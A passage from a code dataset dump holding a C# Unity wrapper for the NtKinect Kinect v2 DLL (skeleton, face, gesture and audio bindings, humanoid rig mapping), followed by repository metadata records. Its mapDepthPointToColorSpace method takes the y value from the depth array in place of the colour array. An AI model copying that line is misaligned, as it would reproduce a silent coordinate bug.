* 3];\n float[] dv = new float[n * 2];\n for (int i=0; i<n; i++) {\n\tsv[3*i] = skel[i].x; sv[3*i+1] = skel[i].y; sv[3*i+2] = skel[i].z;\n }\n GCHandle gch = GCHandle.Alloc(sv,GCHandleType.Pinned);\n GCHandle gch2 = GCHandle.Alloc(dv,GCHandleType.Pinned);\n mapCameraPointToDepthSpace(kinect,gch.AddrOfPinnedObject(),gch2.AddrOfPinnedObject(), n);\n gch.Free();\n gch2.Free();\n depth.Clear();\n for (int i=0; i<n; i++) {\n\tdepth.Add(new Vector2(dv[2*i],dv[2*i+1]));\n }\n }\n public void mapDepthPointToColorSpace(List<Vector2> depth,ushort[] dth,ref List<Vector2> color,int n) {\n float[] dv = new float[n * 2];\n float[] cv = new float[n * 2];\n for (int i=0; i<n; i++) {\n\tdv[2*i] = depth[i].x; dv[2*i+1] = depth[i].y;\n }\n GCHandle gch = GCHandle.Alloc(dv,GCHandleType.Pinned);\n GCHandle gch2 = GCHandle.Alloc(dth,GCHandleType.Pinned);\n GCHandle gch3 = GCHandle.Alloc(cv,GCHandleType.Pinned);\n mapDepthPointToColorSpace(kinect,gch.AddrOfPinnedObject(),gch2.AddrOfPinnedObject(),gch3.AddrOfPinnedObject(), n);\n gch.Free();\n gch2.Free();\n gch3.Free();\n color.Clear();\n for (int i=0; i<n; i++) {\n\tcolor.Add(new Vector2(cv[2*i],dv[2*i+1]));\n }\n }\n void mapDepthPointToCameraSpace(List<Vector2> depth,ushort[] dth,ref List<Vector3> skel,int n) {\n float[] dv = new float[n * 2];\n float[] sv = new float[n * 3];\n for (int i=0; i<n; i++) {\n\tdv[2*i] = depth[i].x; dv[2*i+1] = depth[i].y;\n }\n GCHandle gch = GCHandle.Alloc(dv,GCHandleType.Pinned);\n GCHandle gch2 = GCHandle.Alloc(dth,GCHandleType.Pinned);\n GCHandle gch3 = GCHandle.Alloc(sv,GCHandleType.Pinned);\n mapDepthPointToCameraSpace(kinect,gch.AddrOfPinnedObject(),gch2.AddrOfPinnedObject(),gch3.AddrOfPinnedObject(),n);\n gch.Free();\n gch2.Free();\n gch3.Free();\n skel.Clear();\n for (int i=0; i<n; i++) {\n\tskel.Add(new Vector3(sv[3*i],sv[3*i+1],sv[3*i+2]));\n }\n }\n\n // Multi Thread\n public void acquire() { acquire(kinect); }\n public void release() { release(kinect); }\n // Audio\n public void setAudio(bool flag) {\n setAudio(kinect,flag);\n beamAngle = getBeamAngle(kinect);\n beamAngleConfidence = getBeamAngleConfidence(kinect);\n audioTrackingId = getAudioTrackingId(kinect);\n }\n /*\n public float getBeamAngle() { return getBeamAngle(kinect); }\n public float getBeamAngleConfidence() { return getBeamAngleConfidence(kinect); }\n */\n public void openAudio(string filename) {\n System.IntPtr fname = Marshal.StringToHGlobalUni(filename);\n openAudio(kinect,fname);\n Marshal.FreeHGlobal(fname);\n }\n public void closeAudio() { closeAudio(kinect); }\n public bool isOpenedAudio() { return isOpenedAudio(kinect); }\n // RGB\n public void setRGB() { setRGB(kinect); getRGB2(); }\n public int getRGB2() {\n GCHandle gch = GCHandle.Alloc(rgbImage,GCHandleType.Pinned);\n int n = getRGB(kinect,gch.AddrOfPinnedObject());\n gch.Free();\n return n;\n }\n\n // Depth\n public void setDepth() { setDepth(kinect); getDepth(); }\n public int getDepth() {\n GCHandle gch = GCHandle.Alloc(depthImage,GCHandleType.Pinned);\n int n = getDepth(kinect,gch.AddrOfPinnedObject());\n gch.Free();\n return n;\n }\n\n // Infrared\n public void setInfrared() { setInfrared(kinect); getInfrared(); }\n public int getInfrared() {\n GCHandle gch = GCHandle.Alloc(infraredImage,GCHandleType.Pinned);\n int n = getInfrared(kinect,gch.AddrOfPinnedObject());\n gch.Free();\n return n;\n }\n\n // BodyIndex\n public void setBodyIndex() {setBodyIndex(kinect); getBodyIndex(); }\n public int getBodyIndex() {\n GCHandle gch = GCHandle.Alloc(bodyIndexImage,GCHandleType.Pinned);\n int n = 
getBodyIndex(kinect,gch.AddrOfPinnedObject());\n gch.Free();\n return n;\n }\n\n // Skeleton\n public void setSkeleton() { setSkeleton(kinect); getSkeleton(); }\n public int getSkeleton() {\n GCHandle gch = GCHandle.Alloc(skel,GCHandleType.Pinned);\n GCHandle gch2 = GCHandle.Alloc(skelState,GCHandleType.Pinned);\n GCHandle gch3 = GCHandle.Alloc(skelId,GCHandleType.Pinned);\n GCHandle gch4 = GCHandle.Alloc(skelTrackingId,GCHandleType.Pinned);\n int n = getSkeleton(kinect,gch.AddrOfPinnedObject(),gch2.AddrOfPinnedObject(),gch3.AddrOfPinnedObject(),gch4.AddrOfPinnedObject());\n gch.Free();\n gch2.Free();\n gch3.Free();\n gch4.Free();\n skeleton.Clear(); skeletonState.Clear(); skeletonId.Clear(); skeletonTrackingId.Clear();\n int idx = 0, st=0;\n for (int i=0; i<n; i++) {\n\tskeleton.Add(new List<Vector3>());\n\tskeletonState.Add(new List<int>());\n\tfor (int j=0; j<jointCount; j++) {\n\t skeleton[i].Add(new Vector3(skel[idx++], skel[idx++], skel[idx++]));\n\t skeletonState[i].Add(skelState[st++]);\n\t}\n\tskeletonId.Add(skelId[i]);\n\tskeletonTrackingId.Add(skelTrackingId[i]);\n }\n return n;\n }\n\n private int faceFailCount = 0;\n // Face\n public void setFace() { setFace(kinect,true); getFace(); }\n public int getFace() {\n GCHandle gch = GCHandle.Alloc(fcPoint,GCHandleType.Pinned);\n GCHandle gch2 = GCHandle.Alloc(fcRect,GCHandleType.Pinned);\n GCHandle gch3 = GCHandle.Alloc(fcDirection,GCHandleType.Pinned);\n GCHandle gch4 = GCHandle.Alloc(fcProperty,GCHandleType.Pinned);\n GCHandle gch5 = GCHandle.Alloc(fcTrackingId,GCHandleType.Pinned);\n int n = getFace(kinect,gch.AddrOfPinnedObject(),gch2.AddrOfPinnedObject(),gch3.AddrOfPinnedObject(),gch4.AddrOfPinnedObject(),gch5.AddrOfPinnedObject());\n gch.Free();\n gch2.Free();\n gch3.Free();\n gch4.Free();\n gch5.Free();\n if (n == 0) {\n\tfaceFailCount++;\n\tif (faceFailCount < 10) {\n\t return 0;\n\t} else {\n\t faceFailCount = 0;\n\t}\n }\n facePoint.Clear(); faceRect.Clear(); faceDirection.Clear(); faceProperty.Clear(); faceTrackingId.Clear();\n int idx=0, ridx=0, didx=0, pidx = 0;\n for (int i=0; i<n; i++) {\n\tfacePoint.Add(new List<Vector2>());\n\tfor (int j=0; j<FacePointType_Count; j++) {\n\t facePoint[i].Add(new Vector2(fcPoint[idx++],fcPoint[idx++]));\n\t}\n\tfaceRect.Add(new Vector4(fcRect[ridx++],fcRect[ridx++],fcRect[ridx++],fcRect[ridx++]));\n\tfaceDirection.Add(new Vector3(fcDirection[didx++],fcDirection[didx++],fcDirection[didx++]));\n\tfaceProperty.Add(new List<int>());\n\tfor (int j=0; j<FaceProperty_Count; j++) {\n\t faceProperty[i].Add(fcProperty[pidx++]);\n\t}\n\tfaceTrackingId.Add(fcTrackingId[i]);\n }\n return n;\n }\n public Vector3 getFaceDirectionByTrackingId(ulong tid) {\n for (int i=0; i<faceTrackingId.Count; i++) {\n\tif (faceTrackingId[i] == tid) {\n\t return faceDirection[i];\n\t}\n }\n return Vector3.zero;\n }\n\n // HDFace\n public void setHDFace() { setHDFace(kinect); getHDFace(); }\n public int getHDFace() {\n GCHandle gch = GCHandle.Alloc(hdfcPoint,GCHandleType.Pinned);\n GCHandle gch2 = GCHandle.Alloc(hdfcTrackingId,GCHandleType.Pinned);\n GCHandle gch3 = GCHandle.Alloc(hdfcStatus,GCHandleType.Pinned);\n int n = getHDFace(kinect,gch.AddrOfPinnedObject(),gch2.AddrOfPinnedObject(),gch3.AddrOfPinnedObject());\n gch.Free();\n gch2.Free();\n gch3.Free();\n hdfacePoint.Clear(); hdfaceTrackingId.Clear(); hdfaceStatus.Clear();\n int idx = 0;\n for (int i=0; i<n; i++) {\n\thdfacePoint.Add(new List<Vector3>());\n\tfor (int j=0; j < HDFaceVerticesSize; j++) {\n\t hdfacePoint[i].Add(new 
Vector3(hdfcPoint[idx++],hdfcPoint[idx++],hdfcPoint[idx++]));\n\t}\n\thdfaceTrackingId.Add(hdfcTrackingId[i]);\n\thdfaceStatus.Add(hdfcStatus[i]);\n }\n return n;\n }\n\n // Gesture\n public void setGestureFile(string filename) {\n IntPtr gbd = Marshal.StringToHGlobalUni(filename);\n setGestureFile(kinect,gbd);\n Marshal.FreeHGlobal(gbd);\n }\n public int setGestureId(string name, int id) {\n System.IntPtr g = Marshal.StringToHGlobalUni(name); // discrete\n int n = setGestureId(kinect,g,id);\n Marshal.FreeHGlobal(g);\n return n;\n }\n public void setGesture() { setGesture(kinect); }\n public int getDiscreteGesture() {\n int size = bodyCount * getGidMapSize();\n if (gstId.Length < size) {\n\tgstId = new int[size];\n\tgstFloat = new float[size];\n\tgstTrackingId = new ulong[size];\n }\n GCHandle gch = GCHandle.Alloc(gstId,GCHandleType.Pinned);\n GCHandle gch2 = GCHandle.Alloc(gstFloat,GCHandleType.Pinned);\n GCHandle gch3 = GCHandle.Alloc(gstTrackingId,GCHandleType.Pinned);\n int n = getDiscreteGesture(kinect,gch.AddrOfPinnedObject(),gch2.AddrOfPinnedObject(),gch3.AddrOfPinnedObject());\n gch.Free();\n gch2.Free();\n gch3.Free();\n discreteGesture.Clear(); gestureConfidence.Clear(); discreteGestureTrackingId.Clear();\n for (int i=0; i<n; i++) {\n\tdiscreteGesture.Add(gstId[i]);\n\tgestureConfidence.Add(gstFloat[i]);\n\tdiscreteGestureTrackingId.Add(gstTrackingId[i]);\n }\n return n;\n }\n public int getContinuousGesture() {\n int size = bodyCount * getGidMapSize();\n if (gstId.Length < size) {\n\tgstId = new int[size];\n\tgstFloat = new float[size];\n\tgstTrackingId = new ulong[size];\n }\n GCHandle gch = GCHandle.Alloc(gstId,GCHandleType.Pinned);\n GCHandle gch2 = GCHandle.Alloc(gstFloat,GCHandleType.Pinned);\n GCHandle gch3 = GCHandle.Alloc(gstTrackingId,GCHandleType.Pinned);\n int n = getContinuousGesture(kinect,gch.AddrOfPinnedObject(),gch2.AddrOfPinnedObject(),gch3.AddrOfPinnedObject());\n gch.Free();\n gch2.Free();\n gch3.Free();\n continuousGesture.Clear(); gestureProgress.Clear(); continuousGestureTrackingId.Clear();\n for (int i=0; i<n; i++) {\n\tcontinuousGesture.Add(gstId[i]);\n\tgestureProgress.Add(gstFloat[i]);\n\tcontinuousGestureTrackingId.Add(gstTrackingId[i]);\n }\n return n;\n }\n // Video\n public void openVideo(string filename) {\n IntPtr str = Marshal.StringToHGlobalUni(filename);\n openVideo(kinect,str);\n Marshal.FreeHGlobal(str);\n }\n public void writeVideo() { writeVideo(kinect); }\n public void closeVideo() { closeVideo(kinect); }\n }\n public class RigBone {\n public GameObject gameObject;\n public HumanBodyBones bone;\n public bool isValid;\n public Transform transform {\n get { return animator.GetBoneTransform(bone); }\n }\n Animator animator;\n Quaternion savedLocalRotation;\n Quaternion savedRotation;\n public RigBone(GameObject g, HumanBodyBones b) {\n gameObject = g;\n bone = b;\n isValid = false;\n animator = gameObject.GetComponent<Animator>();\n if (animator == null) {\n\tDebug.Log(\"no Animator Component\");\n\treturn;\n }\n Avatar avatar = animator.avatar;\n if (avatar == null || !avatar.isHuman || !avatar.isValid) {\n\tDebug.Log(\"Avatar is not Humanoid or it is not valid\");\n\treturn;\n }\n if (animator.GetBoneTransform(bone) == null) {\n\tDebug.Log(\"bone \" + bone + \" is note assigned in \"+g);\n\treturn;\n }\n isValid = true;\n savedLocalRotation = animator.GetBoneTransform(bone).localRotation;\n savedRotation = animator.GetBoneTransform(bone).rotation;\n }\n public void set(float a, float x, float y, float z) {\n set(Quaternion.AngleAxis(a, new 
Vector3(x,y,z)));\n }\n public void set(Quaternion q) {\n animator.GetBoneTransform(bone).localRotation = q;\n savedLocalRotation = q;\n }\n public void mul(float a, float x, float y, float z) {\n mul(Quaternion.AngleAxis(a, new Vector3(x,y,z)));\n }\n public void mul(Quaternion q) {\n Transform tr = animator.GetBoneTransform(bone);\n tr.localRotation = q * tr.localRotation;\n }\n public void offset(float a, float x, float y, float z) {\n offset(Quaternion.AngleAxis(a, new Vector3(x,y,z)));\n }\n public void offset(Quaternion q) {\n animator.GetBoneTransform(bone).localRotation = q * savedLocalRotation;\n }\n public void gset(float a, float x, float y, float z) {\n gset(Quaternion.AngleAxis(a, new Vector3(x,y,z)));\n }\n public void gset(Quaternion q) {\n animator.GetBoneTransform(bone).rotation = q;\n savedLocalRotation = q;\n }\n public void gmul(float a, float x, float y, float z) {\n gmul(Quaternion.AngleAxis(a, new Vector3(x,y,z)));\n }\n public void gmul(Quaternion q) {\n Transform tr = animator.GetBoneTransform(bone);\n tr.rotation = q * tr.rotation;\n }\n public void goffset(float a, float x, float y, float z) {\n goffset(Quaternion.AngleAxis(a, new Vector3(x,y,z)));\n }\n public void goffset(Quaternion q) {\n animator.GetBoneTransform(bone).rotation = q * savedRotation;\n }\n public void changeBone(HumanBodyBones b) {\n bone = b;\n savedLocalRotation = animator.GetBoneTransform(bone).localRotation;\n savedRotation = animator.GetBoneTransform(bone).rotation;\n }\n }\n\n class HumanoidSkeleton {\n protected static int[] jointSegment = new int[] {\n Kinect.JointType_SpineBase, Kinect.JointType_SpineMid, // Spine\n Kinect.JointType_Neck, Kinect.JointType_Head, // Neck\n // left\n Kinect.JointType_ShoulderLeft, Kinect.JointType_ElbowLeft, // LeftUpperArm\n Kinect.JointType_ElbowLeft, Kinect.JointType_WristLeft, // LeftLowerArm\n Kinect.JointType_WristLeft, Kinect.JointType_HandLeft, // LeftHand\n Kinect.JointType_HipLeft, Kinect.JointType_KneeLeft, // LeftUpperLeg\n Kinect.JointType_KneeLeft, Kinect.JointType_AnkleLeft, // LeftLowerLeg6\n Kinect.JointType_AnkleLeft, Kinect.JointType_FootLeft, // LeftFoot\n // right\n Kinect.JointType_ShoulderRight, Kinect.JointType_ElbowRight, // RightUpperArm\n Kinect.JointType_ElbowRight, Kinect.JointType_WristRight, // RightLowerArm\n Kinect.JointType_WristRight, Kinect.JointType_HandRight, // RightHand\n Kinect.JointType_HipRight, Kinect.JointType_KneeRight, // RightUpperLeg\n Kinect.JointType_KneeRight, Kinect.JointType_AnkleRight, // RightLowerLeg\n Kinect.JointType_AnkleRight, Kinect.JointType_FootRight, // RightFoot\n };\n public Vector3[] joint = new Vector3[Kinect.jointCount];\n public int[] jointState = new int[Kinect.jointCount];\n\n protected Dictionary<HumanBodyBones,Vector3> trackingSegment = null;\n protected Dictionary<HumanBodyBones, int> trackingState = null;\n\n protected static HumanBodyBones[] humanBone = new HumanBodyBones[] {\n HumanBodyBones.Hips,\n HumanBodyBones.Spine,\n HumanBodyBones.Chest,\n HumanBodyBones.Neck,\n HumanBodyBones.Head,\n HumanBodyBones.LeftUpperArm,\n HumanBodyBones.LeftLowerArm,\n HumanBodyBones.LeftHand,\n HumanBodyBones.LeftUpperLeg,\n HumanBodyBones.LeftLowerLeg,\n HumanBodyBones.LeftFoot,\n HumanBodyBones.RightUpperArm,\n HumanBodyBones.RightLowerArm,\n HumanBodyBones.RightHand,\n HumanBodyBones.RightUpperLeg,\n HumanBodyBones.RightLowerLeg,\n HumanBodyBones.RightFoot,\n };\n\n protected static HumanBodyBones[] targetBone = new HumanBodyBones[] {\n HumanBodyBones.Spine,\n HumanBodyBones.Neck,\n 
HumanBodyBones.LeftUpperArm,\n HumanBodyBones.LeftLowerArm,\n HumanBodyBones.LeftHand,\n HumanBodyBones.LeftUpperLeg,\n HumanBodyBones.LeftLowerLeg,\n HumanBodyBones.LeftFoot,\n HumanBodyBones.RightUpperArm,\n HumanBodyBones.RightLowerArm,\n HumanBodyBones.RightHand,\n HumanBodyBones.RightUpperLeg,\n HumanBodyBones.RightLowerLeg,\n HumanBodyBones.RightFoot,\n };\n\n public GameObject humanoid;\n protected Dictionary<HumanBodyBones, RigBone> rigBone = null;\n protected bool isSavedPosition = false;\n protected Vector3 savedPosition;\n protected Quaternion savedHumanoidRotation;\n\n public HumanoidSkeleton(GameObject h) {\n humanoid = h;\n rigBone = new Dictionary<HumanBodyBones, RigBone>();\n foreach (HumanBodyBones bone in humanBone) {\n\trigBone[bone] = new RigBone(humanoid,bone);\n }\n savedHumanoidRotation = humanoid.transform.rotation;\n trackingSegment = new Dictionary<HumanBodyBones,Vector3>(targetBone.Length);\n trackingState = new Dictionary<HumanBodyBones, int>(targetBone.Length);\n }\n protected void swapJoint(int a, int b) {\n Vector3 tmp = joint[a]; joint[a] = joint[b]; joint[b] = tmp;\n int t = jointState[a]; jointState[a] = jointState[b]; jointState[b] = t;\n }\n public void set(Kinect kinect, int n, bool mirrored = false, bool move=false, bool headMove=true) {\n Vector3 faceDir = kinect.getFaceDirectionByTrackingId(kinect.skeletonTrackingId[n]);\n if (isSavedPosition == false\n\t && kinect.skeletonState[n][Kinect.JointType_SpineBase] != Kinect.TrackingState_NotTracked) {\n\tisSavedPosition = true;\n\tsavedPosition = kinect.skeleton[n][Kinect.JointType_SpineBase];\n }\n for (int i=0; i<kinect.skeleton[n].Count; i++) {\n\tVector3 jt = kinect.skeleton[n][i];\n\tif (mirrored) {\n\t joint[i] = new Vector3(-jt.x, jt.y, -jt.z);\n\t} else {\n\t joint[i] = new Vector3(jt.x, jt.y, savedPosition.z*2 - jt.z);\n\t}\n\tjointState[i] = kinect.skeletonState[n][i];\n }\n if (mirrored) {\n\tswapJoint(Kinect.JointType_ShoulderLeft, Kinect.JointType_ShoulderRight);\n\tswapJoint(Kinect.JointType_ElbowLeft, Kinect.JointType_ElbowRight);\n\tswapJoint(Kinect.JointType_WristLeft, Kinect.JointType_WristRight);\n\tswapJoint(Kinect.JointType_HandLeft, Kinect.JointType_HandRight);\n\tswapJoint(Kinect.JointType_HipLeft, Kinect.JointType_HipRight);\n\tswapJoint(Kinect.JointType_KneeLeft, Kinect.JointType_KneeRight);\n\tswapJoint(Kinect.JointType_AnkleLeft, Kinect.JointType_AnkleRight);\n\tswapJoint(Kinect.JointType_FootLeft, Kinect.JointType_FootRight);\n\tswapJoint(Kinect.JointType_HandTipLeft, Kinect.JointType_HandTipRight);\n\tswapJoint(Kinect.JointType_ThumbLeft, Kinect.JointType_ThumbRight);\n }\n for (int i=0; i<targetBone.Length; i++) {\n\tint s = jointSegment[2*i], e = jointSegment[2*i+1];\n\ttrackingSegment[targetBone[i]] = joint[e] - joint[s];\n\ttrackingState[targetBone[i]] = System.Math.Min(jointState[e],jointState[s]);\n }\n\n Vector3 waist = joint[Kinect.JointType_HipRight] - joint[Kinect.JointType_HipLeft];\n waist = new Vector3(waist.x, 0, waist.z);\n Quaternion rot = Quaternion.FromToRotation(Vector3.right,waist);\n Quaternion rotInv = Quaternion.Inverse(rot);\n \n Vector3 shoulder = joint[Kinect.JointType_ShoulderRight] - joint[Kinect.JointType_ShoulderLeft];\n shoulder = new Vector3(shoulder.x, 0, shoulder.z);\n //Quaternion srot = Quaternion.FromToRotation(Vector3.right,shoulder);\n //Quaternion srotInv = Quaternion.Inverse(srot);\n\n humanoid.transform.rotation = Quaternion.identity;\n //humanoid.transform.rotation = savedHumanoidRotation;\n foreach (HumanBodyBones bone in targetBone) 
{\n\tif (rigBone[bone].isValid && trackingState[bone] != Kinect.TrackingState_NotTracked) {\n\t rigBone[bone].transform.rotation = rotInv * Quaternion.FromToRotation(Vector3.up,trackingSegment[bone]);\n\t}\n }\n //rigBone[HumanBodyBones.Chest].offset(srot);\n if (headMove && faceDir.magnitude > 1e-6) {\n\tfloat pitch = faceDir.x, yaw = faceDir.y, roll = faceDir.z;\n\tif (mirrored) {\n\t pitch = -pitch;\n\t roll = -roll;\n\t} else {\n\t pitch = -pitch;\n\t yaw = -yaw;\n\t}\n\trigBone[HumanBodyBones.Head].transform.rotation = Util.toQ(pitch, yaw, roll);\n }\n Quaternion bodyRot = rot;\n if (mirrored) {\n\tbodyRot = Quaternion.AngleAxis(180,Vector3.up) * bodyRot;\n }\n humanoid.transform.rotation = bodyRot;\n if (move == true) {\n\tVector3 m = joint[Kinect.JointType_SpineBase];\n\tif (mirrored) m = new Vector3(-m.x, m.y, -m.z);\n\thumanoid.transform.position = m;\n }\n }\n }\n class Util {\n public static Quaternion toQ (float pitch, float yaw, float roll) {\n yaw *= Mathf.Deg2Rad;\n pitch *= Mathf.Deg2Rad;\n roll *= Mathf.Deg2Rad;\n float rollOver2 = roll * 0.5f;\n float sinRollOver2 = (float)System.Math.Sin ((double)rollOver2);\n float cosRollOver2 = (float)System.Math.Cos ((double)rollOver2);\n float pitchOver2 = pitch * 0.5f;\n float sinPitchOver2 = (float)System.Math.Sin ((double)pitchOver2);\n float cosPitchOver2 = (float)System.Math.Cos ((double)pitchOver2);\n float yawOver2 = yaw * 0.5f;\n float sinYawOver2 = (float)System.Math.Sin ((double)yawOver2);\n float cosYawOver2 = (float)System.Math.Cos ((double)yawOver2);\n Quaternion result;\n result.w = cosYawOver2 * cosPitchOver2 * cosRollOver2 + sinYawOver2 * sinPitchOver2 * sinRollOver2;\n result.x = cosYawOver2 * sinPitchOver2 * cosRollOver2 + sinYawOver2 * cosPitchOver2 * sinRollOver2;\n result.y = sinYawOver2 * cosPitchOver2 * cosRollOver2 - cosYawOver2 * sinPitchOver2 * sinRollOver2;\n result.z = cosYawOver2 * cosPitchOver2 * sinRollOver2 - sinYawOver2 * sinPitchOver2 * cosRollOver2;\n return result;\n }\n }\n class UnityChanSkeleton: HumanoidSkeleton {\n new protected static int[] jointSegment = new int[] {\n // left\n Kinect.JointType_ShoulderLeft, Kinect.JointType_ElbowLeft, // LeftUpperArm\n Kinect.JointType_ElbowLeft, Kinect.JointType_WristLeft, // LeftLowerArm\n Kinect.JointType_WristLeft, Kinect.JointType_HandLeft, // LeftHand\n Kinect.JointType_HipLeft, Kinect.JointType_KneeLeft, // LeftUpperLeg\n Kinect.JointType_KneeLeft, Kinect.JointType_AnkleLeft, // LeftLowerLeg6\n Kinect.JointType_AnkleLeft, Kinect.JointType_FootLeft, // LeftFoot\n // right\n Kinect.JointType_ShoulderRight, Kinect.JointType_ElbowRight, // RightUpperArm\n Kinect.JointType_ElbowRight, Kinect.JointType_WristRight, // RightLowerArm\n Kinect.JointType_WristRight, Kinect.JointType_HandRight, // RightHand\n Kinect.JointType_HipRight, Kinect.JointType_KneeRight, // RightUpperLeg\n Kinect.JointType_KneeRight, Kinect.JointType_AnkleRight, // RightLowerLeg\n Kinect.JointType_AnkleRight, Kinect.JointType_FootRight, // RightFoot\n };\n new protected static HumanBodyBones[] targetBone = new HumanBodyBones[] {\n HumanBodyBones.LeftUpperArm,\n HumanBodyBones.LeftLowerArm,\n HumanBodyBones.LeftHand,\n HumanBodyBones.LeftUpperLeg,\n HumanBodyBones.LeftLowerLeg,\n HumanBodyBones.LeftFoot,\n HumanBodyBones.RightUpperArm,\n HumanBodyBones.RightLowerArm,\n HumanBodyBones.RightHand,\n HumanBodyBones.RightUpperLeg,\n HumanBodyBones.RightLowerLeg,\n HumanBodyBones.RightFoot,\n };\n public UnityChanSkeleton(GameObject h):base(h) {}\n new public void set(Kinect kinect, int n, 
bool mirrored=false, bool move=false, bool headMove=false) {\n Vector3 faceDir = kinect.getFaceDirectionByTrackingId(kinect.skeletonTrackingId[n]);\n if (isSavedPosition == false\n\t && kinect.skeletonState[n][Kinect.JointType_SpineBase] != Kinect.TrackingState_NotTracked) {\n\tisSavedPosition = true;\n\tsavedPosition = kinect.skeleton[n][Kinect.JointType_SpineBase];\n }\n for (int i=0; i<kinect.skeleton[n].Count; i++) {\n\tVector3 jt = kinect.skeleton[n][i];\n\tif (mirrored) {\n\t joint[i] = new Vector3(-jt.x, jt.y, -jt.z);\n\t} else {\n\t joint[i] = new Vector3(jt.x, jt.y, savedPosition.z*2 - jt.z);\n\t}\n\tjointState[i] = kinect.skeletonState[n][i];\n }\n if (mirrored) {\n\tswapJoint(Kinect.JointType_ShoulderLeft, Kinect.JointType_ShoulderRight);\n\tswapJoint(Kinect.JointType_ElbowLeft, Kinect.JointType_ElbowRight);\n\tswapJoint(Kinect.JointType_WristLeft, Kinect.JointType_WristRight);\n\tswapJoint(Kinect.JointType_HandLeft, Kinect.JointType_HandRight);\n\tswapJoint(Kinect.JointType_HipLeft, Kinect.JointType_HipRight);\n\tswapJoint(Kinect.JointType_KneeLeft, Kinect.JointType_KneeRight);\n\tswapJoint(Kinect.JointType_AnkleLeft, Kinect.JointType_AnkleRight);\n\tswapJoint(Kinect.JointType_FootLeft, Kinect.JointType_FootRight);\n\tswapJoint(Kinect.JointType_HandTipLeft, Kinect.JointType_HandTipRight);\n\tswapJoint(Kinect.JointType_ThumbLeft, Kinect.JointType_ThumbRight);\n }\n for (int i=0; i<targetBone.Length; i++) {\n\tint s = jointSegment[2*i], e = jointSegment[2*i+1];\n\ttrackingSegment[targetBone[i]] = joint[e] - joint[s];\n\ttrackingState[targetBone[i]] = System.Math.Min(jointState[e],jointState[s]);\n }\n\n savedHumanoidRotation = humanoid.transform.rotation;\n humanoid.transform.rotation = Quaternion.identity;\n\n Vector3 waist = joint[Kinect.JointType_HipRight] - joint[Kinect.JointType_HipLeft];\n waist = new Vector3(waist.x, 0, waist.z);\n Quaternion rot = Quaternion.FromToRotation(Vector3.right,waist);\n Quaternion rotInv = Quaternion.Inverse(rot);\n\n Vector3 shoulder = joint[Kinect.JointType_ShoulderRight] - joint[Kinect.JointType_ShoulderLeft];\n shoulder = new Vector3(shoulder.x, 0, shoulder.z);\n Quaternion srot = Quaternion.FromToRotation(Vector3.right,shoulder);\n \n Quaternion defaultQ = Quaternion.AngleAxis(90, new Vector3(0,1,0) )\n\t* Quaternion.AngleAxis( -90, new Vector3(0,0,1 ) );\n foreach (HumanBodyBones b in targetBone) {\n\tif (rigBone[b].isValid && trackingState[b] != Kinect.TrackingState_NotTracked) {\n\t rigBone[b].transform.rotation = rotInv * Quaternion.FromToRotation(Vector3.up,trackingSegment[b]) * defaultQ;\n\t}\n }\n\n Quaternion q = Quaternion.AngleAxis(-90, new Vector3(0,1,0))\n\t* Quaternion.AngleAxis(-90, new Vector3(0,0,1));\n if (headMove && faceDir.magnitude > 1e-6) {\n\tfloat pitch = faceDir.x, yaw = faceDir.y, roll = faceDir.z;\n\tif (mirrored) {\n\t pitch = -pitch;\n\t roll = -roll;\n\t} else {\n\t pitch = -pitch;\n\t yaw = -yaw;\n\t}\n\trigBone[HumanBodyBones.Head].transform.rotation = Util.toQ(pitch, yaw, roll) * q;\n }\n\n if (rigBone[HumanBodyBones.Chest].isValid)\n\trigBone[HumanBodyBones.Chest].transform.rotation = srot * q;\n \n if (mirrored) {\n\thumanoid.transform.rotation = Quaternion.AngleAxis(180,Vector3.up) * rot;\n } else {\n\thumanoid.transform.rotation = rot;\n }\n if (move == true) {\n\tVector3 m = joint[Kinect.JointType_SpineBase];\n\tif (mirrored) m = new Vector3(-m.x, m.y, -m.z);\n\thumanoid.transform.position = m;\n }\n return;\n }\n }\n}\n"
},
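The `Util.toQ` helper above composes a quaternion from yaw/pitch/roll half-angle products. A Python re-statement of the same formula (not part of the repo) can be used to sanity-check the C# version offline:

```python
# Same formula as Util.toQ above: yaw-pitch-roll in degrees -> quaternion (x, y, z, w).
import math

def to_q(pitch, yaw, roll):
    p, y, r = (math.radians(a) / 2 for a in (pitch, yaw, roll))  # half angles
    sp, cp = math.sin(p), math.cos(p)
    sy, cy = math.sin(y), math.cos(y)
    sr, cr = math.sin(r), math.cos(r)
    w = cy * cp * cr + sy * sp * sr
    x = cy * sp * cr + sy * cp * sr
    qy = sy * cp * cr - cy * sp * sr
    z = cy * cp * sr - sy * sp * cr
    return x, qy, z, w

print(to_q(0, 90, 0))  # 90 deg yaw about Y -> approximately (0, 0.707, 0, 0.707)
```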
{
"alpha_fraction": 0.774193525314331,
"alphanum_fraction": 0.774193525314331,
"avg_line_length": 17.600000381469727,
"blob_id": "0664d6f7da6cd93377775e9cca9ff5ad59a8c7a6",
"content_id": "40786030afb9db810f4ff6925cb4bd9bd794019c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 93,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 5,
"path": "/README.md",
"repo_name": "YoshihisaNitta/NtKinectDLL",
"src_encoding": "UTF-8",
"text": "# NtKinectDLL\n\nDLL Library and Wrappers for NtKinect\n\nhttp://nw.tsuda.ac.jp/lec/NtKinectDLL/\n"
},
{
"alpha_fraction": 0.6731509566307068,
"alphanum_fraction": 0.6864460110664368,
"avg_line_length": 30.627853393554688,
"blob_id": "6fca271c89fa36e259e533a9b333c2108bb19b79",
"content_id": "1b20048067f64b6c0722d088caec9a6aa59e3ccf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14291,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 438,
"path": "/NtKinect_py/NtKinect.py",
"repo_name": "YoshihisaNitta/NtKinectDLL",
"src_encoding": "UTF-8",
